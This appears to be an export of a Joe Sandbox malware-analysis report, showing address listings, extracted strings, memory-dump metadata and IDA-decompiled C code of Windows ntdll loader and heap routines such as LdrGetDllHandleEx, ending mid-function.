0x04d6108e
0x04d6108e
0x04d6108e
0x04d61091
0x04d61093
0x04d61096
0x04d61098
0x04d61098
0x04d610b1
0x04d610b4
0x04d610ba
0x04d610bc
0x04d610e1
0x04d610e1
0x04d610e5
0x04d610f3
0x04d610f9
0x04d610f9
0x00000000
0x04d610be
0x04d610be
0x04d610cb
0x04d610cb
0x04d610ce
0x00000000
0x00000000
0x04d610c3
0x04d610c5
0x04d610c7
0x04d61103
0x04d610d2
0x04d610d4
0x04d610d7
0x04d610dc
0x00000000
0x04d610dc
0x04d610c9
0x04d610c9
0x04d610d0
0x00000000
0x04d610d0
0x04d61056
0x04d61056
0x04d61059
0x04d61059
0x04d6105b
0x04d6106f
0x04d6105d
0x04d6105d
0x04d61060
0x04d61063
0x04d61065
0x04d61067
0x04d61067
0x04d61067
0x04d6106a
0x04d6106a
0x04d61076
0x04d61079
0x00000000
0x00000000
0x04d6107b
0x04d61083
0x04d61085
0x00000000
0x00000000
0x00000000
0x04d61085
0x00000000
0x04d61059
0x04d61054
0x04d60ffe
0x04d61003
0x04d61005
0x00000000
0x00000000
0x04d6100f
0x04d61011
0x00000000
0x04d61011
0x04d60fc6
0x04d60fd3
0x04d60fd3
0x04d60fd6
0x00000000
0x00000000
0x04d60fcb
0x04d60fcd
0x04d60fcf
0x04d6101e
0x04d60fda
0x04d60fdc
0x04d60fe4
0x04d60fe9
0x00000000
0x04d60fe9
0x04d60fd1
0x04d60fd1
0x04d60fd8
0x00000000
0x04d60fd8
0x04d60f8b
0x04d60ee9
0x04d60f38
0x04d60f3c
0x00000000
0x00000000
0x04d60f4d
0x00000000
0x00000000
0x00000000
0x04d60eeb
0x04d60eee
0x04d60f00
0x04d60ef0
0x04d60ef2
0x04d60ef7
0x04d60efa
0x04d60efa
0x04d60f04
0x04d60f07
0x00000000
0x00000000
0x04d60f09
0x04d60f1f
0x04d60f24
0x00000000
0x00000000
0x04d60f26
0x04d60f2d
0x00000000
0x00000000
0x04d60f2f
0x04d60f32
0x04d60f35
0x04d60f35
0x00000000
0x04d60f35
0x04d60f0b
0x04d60f18
0x00000000
0x00000000
0x04d60f1a
0x00000000
0x04d60f1a
0x04d61215
0x04d61215
0x04d6121e
0x00000000

Strings

Heap block at %p has corrupted PreviousSize (%lx), xrefs: 04D612ED
Free Heap block %p modified at %p after it was freed, xrefs: 04D6129B
Heap block at %p has incorrect segment offset (%x), xrefs: 04D6139A
Heap Segment at %p contains invalid NumberOfUnCommittedRanges (%x != %x), xrefs: 04D61478
HEAP: , xrefs: 04D61286, 04D612D6, 04D61328, 04D61389, 04D613CD, 04D61415, 04D61466
HEAP[%wZ]: , xrefs: 04D6124D, 04D61279, 04D612C9, 04D6131B, 04D6137C, 04D613C0, 04D61459
Heap Segment at %p contains invalid NumberOfUnCommittedPages (%x != %x), xrefs: 04D61425
Heap block at %p is not last block in segment (%p), xrefs: 04D61337
Heap entry %p has incorrect PreviousSize field (%04x instead of %04x), xrefs: 04D613EB

Memory Dump Source

Source File: 00000004.00000002.5838791509.0000000004C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04C80000, based on PE: true

Associated: 00000004.00000002.5838791509.0000000004DA9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.5838791509.0000000004DAD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_4c80000_control.jbxd

Similarity

API ID:
String ID: Free Heap block %p modified at %p after it was freed$HEAP: $HEAP[%wZ]: $Heap Segment at %p contains invalid NumberOfUnCommittedPages (%x != %x)$Heap Segment at %p contains invalid NumberOfUnCommittedRanges (%x != %x)$Heap block at %p has corrupted PreviousSize (%lx)$Heap block at %p has incorrect segment offset (%x)$Heap block at %p is not last block in segment (%p)$Heap entry %p has incorrect PreviousSize field (%04x instead of %04x)
API String ID: 0-3591852110
Opcode ID: e516c7e167f1cb8e40a420589b2512ceb08879fe31a4d5beb97046759f5d9f61
Instruction ID: acd76d2b8c4a2308e1d51c99126a8e615dd25599e09b01e571741897e3101f73
Opcode Fuzzy Hash: e516c7e167f1cb8e40a420589b2512ceb08879fe31a4d5beb97046759f5d9f61
Instruction Fuzzy Hash: 34128B30600686AFDB25DF68C445BBABBF2FF09718F148459E4868B642E775F881DB90

Uniqueness

Uniqueness Score: -1.00%

Function 04CCAC20 Relevance: 11.8, Strings: 9, Instructions: 509
COMMONCrypto

Download Yara Rule

C-Code - Quality: 89%

			E04CCAC20(signed int __ecx, signed char _a4, signed int _a8, intOrPtr _a16, signed char _a20) {
				signed int _v8;
				char _v276;
				void* _v280;
				void* _v284;
				void* _v304;
				void* _v308;
				void* _v312;
				void* _v324;
				short _v532;
				signed short* _v536;
				void* _v540;
				char _v544;
				void* _v548;
				void* _v576;
				signed int _v604;
				signed int _v608;
				signed int _v620;
				void* _v628;
				char _v632;
				char _v636;
				signed short _v640;
				signed int _v644;
				signed int _v648;
				signed int _v652;
				signed short _v656;
				signed short _v660;
				signed char _v664;
				signed char _v668;
				char _v669;
				void* _v672;
				signed int _v676;
				void* _v677;
				void* _v684;
				void* _v696;
				void* _v700;
				void* _v704;
				void* _v708;
				void* _v712;
				void* _v716;
				void* _v724;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t197;
				void* _t215;
				void* _t225;
				signed int _t250;
				char* _t255;
				signed char* _t258;
				signed int _t267;
				intOrPtr _t269;
				intOrPtr* _t270;
				intOrPtr _t275;
				signed int _t276;
				intOrPtr _t283;
				intOrPtr _t295;
				signed short _t299;
				signed short _t300;
				intOrPtr _t307;
				signed char _t314;
				void* _t315;
				signed short* _t316;
				signed int _t317;
				signed int _t318;
				signed short _t340;
				signed short _t342;
				intOrPtr _t343;
				intOrPtr _t346;
				intOrPtr _t347;
				intOrPtr _t350;
				intOrPtr _t351;
				intOrPtr _t354;
				signed int _t356;
				signed int _t357;
				signed int _t362;
				void* _t363;
				signed char _t364;
				signed int _t366;
				unsigned int _t368;
				signed short* _t369;
				intOrPtr _t371;
				void* _t372;
				void* _t373;
				signed int _t374;
				signed int _t376;
				signed int _t378;
				signed int _t379;

				_t319 = __ecx;
				_t378 = (_t376 & 0xfffffff8) - 0x2a4;
				_v8 =  *0x4dab370 ^ _t378;
				_t371 = _a16;
				_v668 = _a20;
				if(( *0x4da37c0 & 0x00000009) != 0) {
					E04D2E692("minkernel\\ntdll\\ldrapi.c", 0x34c, "LdrGetDllHandleEx", 3, "DLL name: %wZ\n", _t371);
					_t378 = _t378 + 0x18;
				}
				_t362 =  *(_t371 + 4);
				E04CF8F40( &_v620, 0, 0x50);
				_t197 = _a8;
				_t379 = _t378 + 0xc;
				if((_t197 & 0x00000001) == 0 && _t197 != 0) {
					_v620 = _t197;
					if(( *0x4da37c0 & 0x00000005) != 0) {
						E04D2E692("minkernel\\ntdll\\ldrutil.c", 0x5a5, "LdrpInitializeDllPath", 2, "DLL search path passed in externally: %ws\n", _t197);
						_t379 = _t379 + 0x18;
					}
					_t355 = _t362;
					E04D2FF03(_t362, _v620, 0x14c0);
				} else {
					_v604 = _t362;
					_v608 = _t197 & 0xfffffffe;
				}
				_t314 = _a4;
				if((_t314 & 0xfffffff8) != 0) {
					_t372 = 0xc000000d;
					L57:
					if(_v544 != 0) {
						E04CDE7E0(_t319, _v620);
					}
					if(( *0x4da37c0 & 0x00000009) != 0) {
						E04D2E692("minkernel\\ntdll\\ldrapi.c", 0x37e, "LdrGetDllHandleEx", 4, "Status: 0x%08lx\n", _t372);
						_t379 = _t379 + 0x18;
					}
					_pop(_t363);
					_pop(_t373);
					_pop(_t315);
					return E04CF4B50(_t372, _t315, _v8 ^ _t379, _t355, _t363, _t373);
				}
				if((_t314 & 0x00000003) == 3) {
					_t372 = 0xc000000d;
					goto L57;
				}
				_t364 = _v668;
				if(_t364 == 0) {
					if((_t314 & 0x00000002) != 0) {
						goto L7;
					}
					_t372 = 0xc000000d;
					goto L57;
				}
				L7:
				if(E04CCC4A0(0,  &_v636) < 0) {
					_v669 = 0;
				} else {
					_v669 = 1;
				}
				_v664 = 0;
				_v536 =  &_v532;
				_t355 =  &_v540;
				_v676 = 0;
				_v532 = 0;
				_v540 = 0x1000000;
				_t372 = E04CCB0D0(_t371,  &_v540, 0,  &_v664);
				if(_t372 < 0) {
					L38:
					_t211 = _v536;
					_t319 =  &_v532;
					if( &_v532 != _v536) {
						E04CABA80(_t211);
					}
					_v540 = 0x1000000;
					_v536 =  &_v532;
					_v532 = 0;
					if(_v669 != 0) {
						E04CCC4A0(_v636,  &_v636);
					}
					if(_t372 < 0) {
						goto L57;
					} else {
						if((_t314 & 0x00000002) != 0) {
							_t215 = E04CE7DF6(_v676);
							L115:
							_t372 = _t215;
							L44:
							if(_t372 >= 0 && _t364 != 0) {
								 *_t364 =  *((intOrPtr*)(_v676 + 0x18));
							}
							_t319 = _v676;
							E04CCD3E1(_t314, _v676, _t372);
							goto L57;
						}
						if((_t314 & 0x00000001) == 0) {
							_t215 = E04CCF602(_v676, _t355);
							goto L115;
						}
						goto L44;
					}
				} else {
					_t221 = _v664;
					if((_t221 & 0x00000020) == 0) {
						_t366 = _t221 & 0x00000200;
						if(_t366 == 0) {
							L69:
							_v276 = 0x1000000;
							 *((intOrPtr*)(_t379 + 0x1a4)) = _t379 + 0x1a8;
							 *((short*)(_t379 + 0x1a8)) = 0;
							_v648 = 0;
							_v644 = 0;
							if(_t366 == 0) {
								_t355 =  &_v620;
								_t225 = E04CD2480( &_v540,  &_v620, 0, 0,  &_v276,  &_v632,  &_v648, 0, 0);
							} else {
								_t355 =  &_v276;
								_t225 = E04CD1F5E( &_v540,  &_v276,  &_v632,  &_v648, _t221);
							}
							_t372 = _t225;
							if(_t372 >= 0) {
								_t355 =  &_v648;
								_t372 = E04CCF380( &_v632,  &_v648, _v664,  &_v676,  &_v660);
								if(_t372 == 0xc0000135) {
									_t355 =  &_v676;
									_t372 = E04CE5751( &_v276,  &_v676,  &_v660);
								}
							}
							E04CDE3C9( &_v648);
							_t227 =  *((intOrPtr*)(_t379 + 0x1a4));
							if(_t379 + 0x1a8 !=  *((intOrPtr*)(_t379 + 0x1a4))) {
								E04CABA80(_t227);
							}
							_v276 = 0x1000000;
							 *((intOrPtr*)(_t379 + 0x1a4)) = _t379 + 0x1a8;
							 *((short*)(_t379 + 0x1a8)) = 0;
							L34:
							if(( *0x4da37c0 & 0x00000009) != 0) {
								E04D2E692("minkernel\\ntdll\\ldrfind.c", 0x1e0, "LdrpFindLoadedDllInternal", 4, "Status: 0x%08lx\n", _t372);
								_t379 = _t379 + 0x18;
							}
							if(_t372 >= 0 && _v660 < 6 && ( *( *[fs:0x18] + 0xfca) & 0x00001000) == 0) {
								E04CCD3E1(_t314, _v676, _t372);
								_v676 = 0;
								E04CD19DF(0);
								_t355 =  &_v620;
								_t372 = E04CE9E13( &_v540,  &_v620,  &_v676,  &_v660, _v664);
								E04CE79F9();
								if(_t372 >= 0 && _v652 != 9) {
									E04CCD3E1(_t314, _v668, _t372);
									_v668 = 0;
									_t372 = 0xc0000135;
								}
							}
							_t364 = _v668;
							goto L38;
						}
						_t355 =  &_v540;
						_t372 = E04CCF380(0,  &_v540, _t221,  &_v676,  &_v660);
						if(_t372 >= 0) {
							goto L34;
						}
						_t221 = _v664;
						goto L69;
					}
					_t374 = 0;
					_t368 = (_v540 & 0x0000ffff) >> 1;
					_t316 = _v536;
					if(_t368 == 0) {
						L16:
						if(_t374 == 0) {
							_t374 = 0x80000000;
						}
						L04CC2330(_t221, 0x4da6668);
						_t250 = _t374 & 0x0000001f;
						_t340 =  *(0x4da5b80 + _t250 * 8);
						_t355 = 0x4da5b80 + _t250 * 8;
						_v656 = _t355;
						_v660 = _t340;
						if(_t340 == _t355) {
							L61:
							_t372 = 0xc0000135;
							goto L30;
						} else {
							_t267 = _t355;
							do {
								_t355 = _t340 - 0x3c;
								_v648 = _t355;
								if(_t374 !=  *((intOrPtr*)(_t355 + 0x90))) {
									goto L60;
								}
								if((_v664 & 0x00000008) != 0) {
									if(( *(_t355 + 0x34) & 0x00000001) == 0) {
										goto L60;
									}
								}
								if(( *(_t355 + 0x34) & 0x10000000) != 0) {
									goto L60;
								}
								_t317 = _v540 & 0x0000ffff;
								if(_t317 != ( *(_t355 + 0x2c) & 0x0000ffff)) {
									L98:
									_t267 = _v652;
									goto L60;
								}
								_t369 = _v536;
								_t269 = _t369 + _t317;
								_v632 = _t269;
								if(_t369 >= _t269) {
									L28:
									_t270 =  *((intOrPtr*)(_t355 + 0x50));
									if( *((intOrPtr*)(_t270 + 0xc)) != 0xffffffff) {
										if(( *( *_t270 - 0x20) & 0x00000020) == 0) {
											asm("lock inc dword [edx+0x9c]");
										}
									}
									_t372 = 0;
									_v676 = _t355;
									_v660 =  *( *((intOrPtr*)(_t355 + 0x50)) + 0x20);
									L30:
									E04CC24D0(0x4da6668);
									if(E04CC3C40() != 0) {
										_t255 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
									} else {
										_t255 = 0x7ffe0384;
									}
									if( *_t255 != 0) {
										if(( *( *[fs:0x30] + 0x240) & 0x00000004) != 0) {
											if(E04CC3C40() == 0) {
												_t258 = 0x7ffe0385;
											} else {
												_t258 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
											}
											if(( *_t258 & 0x00000020) != 0) {
												_t355 = 0;
												E04D30227(0x14a0, 0, 0, ( &_v540 & 0xffffff00 | _t372 > 0x00000000) - 0x00000001 & 3,  &_v540, 0);
											}
										}
									}
									_t314 = _a4;
									goto L34;
								} else {
									_t275 =  *((intOrPtr*)(_t355 + 0x30)) - _t369;
									 *((intOrPtr*)(_t379 + 0x44)) = _t275;
									do {
										_t342 =  *(_t275 + _t369) & 0x0000ffff;
										_t318 =  *_t369 & 0x0000ffff;
										_v640 = _t342;
										if(_t318 != _t342) {
											if(_t318 < 0x61) {
												L52:
												if(_t342 >= 0x61) {
													if(_t342 > 0x7a) {
														if( *0x4da6914 == 0 || _t342 < 0xc0) {
															goto L53;
														} else {
															_t356 = _t342 & 0x0000ffff;
															_t343 =  *0x4da6914; // 0x7f560654
															_t355 = _t356 & 0x0000000f;
															_t283 =  *0x4da6914; // 0x7f560654
															_t346 =  *0x4da6914; // 0x7f560654
															_t276 =  *((intOrPtr*)(_t346 + (( *(_t283 + (( *(_t343 + (_t356 >> 8) * 2) & 0x0000ffff) + (_t356 >> 0x00000004 & 0x0000000f)) * 2) & 0x0000ffff) + (_t356 & 0x0000000f)) * 2)) + _v640 & 0x0000ffff;
															L54:
															if(_t318 != _t276) {
																_t340 = _v656;
																goto L98;
															}
															_t275 =  *((intOrPtr*)(_t379 + 0x44));
															goto L26;
														}
													}
													_t276 = _t342 - 0x00000020 & 0x0000ffff;
													goto L54;
												}
												L53:
												_t276 = _t342 & 0x0000ffff;
												goto L54;
											}
											if(_t318 > 0x7a) {
												if( *0x4da6914 != 0 && _t318 >= 0xc0) {
													_t347 =  *0x4da6914; // 0x7f560654
													_t357 = _t318;
													_t355 = _t357 & 0x0000000f;
													_t295 =  *0x4da6914; // 0x7f560654
													_t350 =  *0x4da6914; // 0x7f560654
													_t342 = _v640;
													_t299 =  *((intOrPtr*)(_t350 + (( *(_t295 + (( *(_t347 + (_t318 >> 8) * 2) & 0x0000ffff) + (_t357 >> 0x00000004 & 0x0000000f)) * 2) & 0x0000ffff) + (_t357 & 0x0000000f)) * 2)) + _t318;
													L51:
													_t318 = _t299 & 0x0000ffff;
												}
												goto L52;
											}
											_t88 = _t318 - 0x20; // 0xffffe0
											_t299 = _t88;
											goto L51;
										}
										L26:
										_t369 =  &(_t369[1]);
									} while (_t369 < _v632);
									_t355 = _v648;
									goto L28;
								}
								L60:
								_t340 =  *_t340;
								_v656 = _t340;
							} while (_t340 != _t267);
							goto L61;
						}
					} else {
						goto L12;
					}
					do {
						L12:
						_t300 =  *_t316 & 0x0000ffff;
						_t316 =  &(_t316[1]);
						_t368 = _t368 - 1;
						_v656 = _t300;
						if(_t300 >= 0x61) {
							if(_t300 > 0x7a) {
								_t351 =  *0x4da6914; // 0x7f560654
								if(_t351 != 0 && _t300 >= 0xc0) {
									_t359 = _t300 & 0x0000ffff;
									_t307 =  *0x4da6914; // 0x7f560654
									_t354 =  *0x4da6914; // 0x7f560654
									_t300 =  *((intOrPtr*)(_t354 + (( *(_t307 + (( *(_t351 + ((_t300 & 0x0000ffff) >> 8) * 2) & 0x0000ffff) + ((_t300 & 0x0000ffff) >> 0x00000004 & 0x0000000f)) * 2) & 0x0000ffff) + (_t359 & 0x0000000f)) * 2)) + _v656;
								}
							} else {
								_t300 = _t300 + 0xffffffe0;
							}
						}
						_t221 = _t300 & 0xffff;
						_t374 = _t374 * 0x1003f + (_t300 & 0xffff);
					} while (_t368 != 0);
					goto L16;
				}
			}

0x04ccac20
0x04ccac28
0x04ccac35
0x04ccac48
0x04ccac4c
0x04ccac50
0x04d17e98
0x04d17e9d
0x04d17e9d
0x04ccac56
0x04ccac62
0x04ccac67
0x04ccac6a
0x04ccac6f
0x04d17eac
0x04d17eb0
0x04d17ec9
0x04d17ece
0x04d17ece
0x04d17eda
0x04d17edc
0x04ccac79
0x04ccac7c
0x04ccac80
0x04ccac80
0x04ccac84
0x04ccac8d
0x04d17ee6
0x04ccaf39
0x04ccaf41
0x04d181ad
0x04d181ad
0x04ccaf4e
0x04d181ce
0x04d181d3
0x04d181d3
0x04ccaf5d
0x04ccaf5e
0x04ccaf5f
0x04ccaf6a
0x04ccaf6a
0x04ccac9a
0x04ccaf34
0x00000000
0x04ccaf34
0x04ccaca0
0x04ccaca6
0x04d17ef3
0x00000000
0x00000000
0x04d17ef9
0x00000000
0x04d17ef9
0x04ccacac
0x04ccacba
0x04d17f03
0x04ccacc0
0x04ccacc0
0x04ccacc0
0x04ccaccc
0x04ccacd4
0x04ccacdb
0x04ccace4
0x04ccacec
0x04ccacfa
0x04ccad0d
0x04ccad11
0x04ccae86
0x04ccae86
0x04ccae8d
0x04ccae96
0x04d18184
0x04d18184
0x04ccaea3
0x04ccaeae
0x04ccaeb7
0x04ccaec3
0x04ccaece
0x04ccaece
0x04ccaed5
0x00000000
0x04ccaed7
0x04ccaeda
0x04d18192
0x04d181a2
0x04d181a2
0x04ccaee9
0x04ccaeeb
0x04ccaef8
0x04ccaef8
0x04ccaefa
0x04ccaefe
0x00000000
0x04ccaefe
0x04ccaee3
0x04d1819d
0x00000000
0x04d1819d
0x00000000
0x04ccaee3
0x04ccad17
0x04ccad17
0x04ccad1d
0x04ccafb4
0x04ccafba
0x04ccafe3
0x04ccafea
0x04ccaff5
0x04ccaffe
0x04ccb006
0x04ccb00a
0x04ccb017
0x04d180ce
0x04d180d2
0x04ccb01d
0x04ccb028
0x04ccb02f
0x04ccb02f
0x04ccb034
0x04ccb038
0x04ccb048
0x04ccb055
0x04ccb05d
0x04ccb064
0x04ccb074
0x04ccb074
0x04ccb05d
0x04ccb07a
0x04ccb07f
0x04ccb08f
0x04ccb0ba
0x04ccb0ba
0x04ccb098
0x04ccb0a3
0x04ccb0ac
0x04ccae66
0x04ccae6d
0x04d180f3
0x04d180f8
0x04d180f8
0x04ccae75
0x04d1811c
0x04d18123
0x04d1812b
0x04d1813e
0x04d1814e
0x04d18150
0x04d18157
0x04d1816c
0x04d18171
0x04d18179
0x04d18179
0x04d18157
0x04ccae82
0x00000000
0x04ccae82
0x04ccafc7
0x04ccafd5
0x04ccafd9
0x00000000
0x00000000
0x04ccafdf
0x00000000
0x04ccafdf
0x04ccad2b
0x04ccad2d
0x04ccad2f
0x04ccad36
0x04ccad66
0x04ccad68
0x04d17f61
0x04d17f61
0x04ccad73
0x04ccad7a
0x04ccad7d
0x04ccad84
0x04ccad8b
0x04ccad8f
0x04ccad95
0x04ccaf7b
0x04ccaf7b
0x00000000
0x04ccad9b
0x04ccad9b
0x04ccada0
0x04ccada0
0x04ccada3
0x04ccadad
0x00000000
0x00000000
0x04ccadb8
0x04d17f6f
0x00000000
0x00000000
0x04d17f75
0x04ccadc5
0x00000000
0x00000000
0x04ccadcb
0x04ccadd9
0x04d18034
0x04d18034
0x00000000
0x04d18034
0x04ccaddf
0x04ccade6
0x04ccade9
0x04ccadef
0x04ccae21
0x04ccae21
0x04ccae28
0x04ccaf8b
0x04ccaf91
0x04ccaf91
0x04ccaf8b
0x04ccae31
0x04ccae33
0x04ccae3a
0x04ccae3e
0x04ccae43
0x04ccae4f
0x04d18046
0x04ccae55
0x04ccae55
0x04ccae55
0x04ccae5d
0x04d1805d
0x04d1806a
0x04d1807c
0x04d1806c
0x04d18075
0x04d18075
0x04d18084
0x04d180a0
0x04d180aa
0x04d180aa
0x04d18084
0x04d1805d
0x04ccae63
0x00000000
0x04ccadf1
0x04ccadf4
0x04ccadf6
0x04ccae00
0x04ccae00
0x04ccae04
0x04ccae07
0x04ccae0e
0x04ccaf08
0x04ccaf19
0x04ccaf1d
0x04ccafa1
0x04d17fdb
0x00000000
0x04d17fef
0x04d17fef
0x04d17ff2
0x04d18006
0x04d1800e
0x04d18017
0x04d18028
0x04ccaf22
0x04ccaf25
0x04d18030
0x00000000
0x04d18030
0x04ccaf2b
0x00000000
0x04ccaf2b
0x04d17fdb
0x04ccafaa
0x00000000
0x04ccafaa
0x04ccaf1f
0x04ccaf1f
0x00000000
0x04ccaf1f
0x04ccaf0d
0x04d17f81
0x04d17f95
0x04d17f9b
0x04d17fab
0x04d17fb3
0x04d17fbc
0x04d17fc8
0x04d17fcc
0x04ccaf16
0x04ccaf16
0x04ccaf16
0x00000000
0x04d17f81
0x04ccaf13
0x04ccaf13
0x00000000
0x04ccaf13
0x04ccae14
0x04ccae14
0x04ccae17
0x04ccae1d
0x00000000
0x04ccae1d
0x04ccaf6d
0x04ccaf6d
0x04ccaf6f
0x04ccaf73
0x00000000
0x04ccada0
0x00000000
0x00000000
0x00000000
0x04ccad38
0x04ccad38
0x04ccad38
0x04ccad3b
0x04ccad3e
0x04ccad3f
0x04ccad46
0x04ccad4b
0x04d17f0d
0x04d17f15
0x04d17f29
0x04d17f42
0x04d17f4b
0x04d17f57
0x04d17f57
0x04ccad51
0x04ccad51
0x04ccad51
0x04ccad4b
0x04ccad5d
0x04ccad60
0x04ccad62
0x00000000
0x04ccad38

Strings

minkernel\ntdll\ldrapi.c, xrefs: 04D17E93, 04D181C9
LdrpFindLoadedDllInternal, xrefs: 04D180E4
minkernel\ntdll\ldrfind.c, xrefs: 04D180EE
minkernel\ntdll\ldrutil.c, xrefs: 04D17EC4
Status: 0x%08lx, xrefs: 04D180DD, 04D181B8
LdrpInitializeDllPath, xrefs: 04D17EBA
DLL search path passed in externally: %ws, xrefs: 04D17EB3
LdrGetDllHandleEx, xrefs: 04D17E89, 04D181BF
DLL name: %wZ, xrefs: 04D17E82

Memory Dump Source

Source File: 00000004.00000002.5838791509.0000000004C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04C80000, based on PE: true

Associated: 00000004.00000002.5838791509.0000000004DA9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.5838791509.0000000004DAD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_4c80000_control.jbxd

Similarity

API ID:
String ID: DLL name: %wZ$DLL search path passed in externally: %ws$LdrGetDllHandleEx$LdrpFindLoadedDllInternal$LdrpInitializeDllPath$Status: 0x%08lx$minkernel\ntdll\ldrapi.c$minkernel\ntdll\ldrfind.c$minkernel\ntdll\ldrutil.c
API String ID: 0-3197712848
Opcode ID: a8b370e7bad9ba291ceb0cc7bcfa4b74372409df44fdb192dacb999367e5ea0a
Instruction ID: 3c5e16d33b05e807daa76fa68f55b35f5e5dac353b49d2d7e707ca372a3d631a
Opcode Fuzzy Hash: a8b370e7bad9ba291ceb0cc7bcfa4b74372409df44fdb192dacb999367e5ea0a
Instruction Fuzzy Hash: E112C271A09355DBD724DF14C484BAAB7E6BF84708F08091EF9858B290E735FA44DB92

Uniqueness

Uniqueness Score: -1.00%

Function 04D48D0A Relevance: 10.4, Strings: 8, Instructions: 401
COMMON

Download Yara Rule

C-Code - Quality: 77%

			E04D48D0A(intOrPtr __ecx, signed short __edx, signed int _a4, signed int* _a8) {
				signed int _v8;
				char _v532;
				char _v536;
				char _v1052;
				char _v1328;
				char _v1332;
				void* _v1404;
				char _v1484;
				char _v1492;
				char _v1496;
				signed short _v1500;
				signed short _v1504;
				char* _v1508;
				short _v1510;
				char _v1512;
				signed int _v1516;
				char _v1520;
				signed short _v1524;
				signed short _v1528;
				signed int _v1532;
				signed int _v1536;
				void* _v1540;
				char _v1544;
				intOrPtr _v1548;
				signed int _v1552;
				void* _v1556;
				char _v1557;
				char _v1569;
				void* __ebx;
				void* __edi;
				void* __esi;
				short _t123;
				short _t124;
				signed int _t125;
				signed int _t149;
				signed int _t150;
				char* _t175;
				char* _t177;
				signed int _t205;
				void* _t206;
				signed short _t207;
				signed int _t208;
				intOrPtr _t212;
				signed int _t216;
				signed int* _t219;
				void* _t220;
				signed int _t222;
				void* _t223;
				signed int _t224;
				signed int _t225;
				signed int _t226;
				signed int _t227;
				signed int _t230;
				signed int _t232;
				signed int _t234;

				_t215 = __edx;
				_t232 = (_t230 & 0xfffffff8) - 0x614;
				_v8 =  *0x4dab370 ^ _t232;
				_t219 = _a8;
				_t205 = 0;
				_v1548 = __ecx;
				_v1516 = _v1516 & 0;
				_t222 = __edx;
				E04CF8F40( &_v1052, 0, 0x208);
				E04CF8F40( &_v532, 0, 0x208);
				_t234 = _t232 + 0x18;
				_v1508 = "\\";
				_t123 = 2;
				_v1512 = _t123;
				_t124 = 4;
				_v1510 = _t124;
				if(_t219 == 0) {
					L73:
					_t125 = 0xc000000d;
					L74:
					_pop(_t220);
					_pop(_t223);
					_pop(_t206);
					return E04CF4B50(_t125, _t206, _v8 ^ _t234, _t215, _t220, _t223);
				}
				_t212 = _v1548;
				if(_t212 == 0) {
					goto L73;
				}
				_t216 = _a4;
				_v1552 = _t216;
				_v1552 = _v1552 & 1;
				_v1536 = _t216;
				_v1536 = _v1536 & 0x00000002;
				_v1532 = _t216;
				_v1532 = _v1532 & 0x00000008;
				_a4 = _t216 & 0x00000004;
				_t215 = 0;
				 *_t219 = 0;
				_t219[1] = 0;
				_v1528 = 0;
				_v1524 = 0;
				_v1504 = 0;
				_v1500 = 0;
				_v1556 = 0;
				_v1557 = 1;
				_v1540 = 0;
				if(_t222 == 0) {
					_push( &_v1544);
					_push(4);
					_push( &_v1556);
					_push(0x1d);
					_push(_t212);
					_t224 = E04CF2BC0();
					__eflags = _t224;
					if(_t224 < 0) {
						goto L66;
					}
					__eflags = _v1556;
					if(__eflags == 0) {
						goto L4;
					}
					_push( &_v1544);
					_push(0x48);
					_push( &_v1404);
					_push(0x1f);
					_push(_v1548);
					_t224 = E04CF2BC0();
					__eflags = _t224;
					if(_t224 < 0) {
						goto L66;
					}
					_t205 = _v1404;
					__eflags = _t205;
					if(__eflags != 0) {
						goto L4;
					} else {
						_t224 = 0xc0000001;
						goto L66;
					}
				} else {
					_t205 = _t222;
					_v1556 = 1;
					L4:
					_push( &_v1544);
					_push(4);
					_push( &_v1540);
					_push(0x2a);
					_push(_v1548);
					_t224 = E04CF2BC0();
					if(_t224 < 0) {
						L66:
						E04CC3B90( &_v1504);
						if(_t224 < 0) {
							E04CC3B90(_t219);
						}
						if(_v1557 != 0) {
							E04CC3B90( &_v1528);
						}
						_t134 = _v1516;
						if(_v1516 != 0) {
							E04CC3BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t134);
						}
						_t125 = _t224;
						goto L74;
					}
					if(_v1540 == 0) {
						L8:
						_push( &_v1544);
						_push(4);
						_push( &_v1520);
						_push(0xc);
						_push(_v1548);
						_t224 = E04CF2BC0();
						if(_t224 < 0) {
							goto L66;
						}
						if(_v1556 == 0) {
							L13:
							_t207 = 0x104;
							L14:
							_push( &_v1544);
							_push(0x118);
							_push( &_v1332);
							_push(0x2c);
							_push(_v1548);
							_t224 = E04CF2BC0();
							if(_t224 < 0) {
								goto L66;
							}
							_t225 = _v1556;
							if(_v1540 != 0 || _t225 != 0 || _v1520 != E04CC3C40()) {
								_t149 = 0;
								__eflags = 0;
							} else {
								_t149 = 1;
							}
							if(_v1552 != 0) {
								__eflags = _a4;
								if(_a4 != 0) {
									_push(L"AppContainerNamedObjects");
									goto L40;
								}
								_t175 = L"\\AppContainerNamedObjects";
								__eflags = _t225;
								if(_t225 == 0) {
									_t175 = 0x4c85dfc;
								}
								_push(_t175);
								_t150 = E04D4774F( &_v1052, _t207, L"Global\\Session\\%ld%s", _v1520);
								_t234 = _t234 + 0x14;
							} else {
								if(_t149 != 0) {
									_push(L"\\BaseNamedObjects");
									L40:
									_t215 = _t207;
									_t150 = E04D4771A( &_v1052, _t207);
									L41:
									_t224 = _t150;
									if(_t224 < 0) {
										goto L66;
									}
									_v1552 = _v1552 & 0x00000000;
									_t215 = 0x208;
									_t214 =  &_v1052;
									_t224 = E04D476DA( &_v1052, 0x208,  &_v1552);
									if(_t224 < 0) {
										goto L66;
									}
									if(_v1540 == 0 || _v1536 != 0) {
										_t226 = _v1552;
									} else {
										_t226 = (_v1504 & 0x0000ffff) + 2 + _v1552;
									}
									if(_v1556 != 0) {
										_t226 = _t226 + (_v1528 & 0x0000ffff) + 2;
									}
									if(_v1328 != 0 && _v1532 == 0) {
										E04CF5050(_t214,  &_v1492, _v1332);
										_t226 = _t226 + (_v1500 & 0x0000ffff) + 2;
									}
									_t227 = _t226 + 2;
									_t208 = E04CC5D60(_t227);
									if(_t208 != 0) {
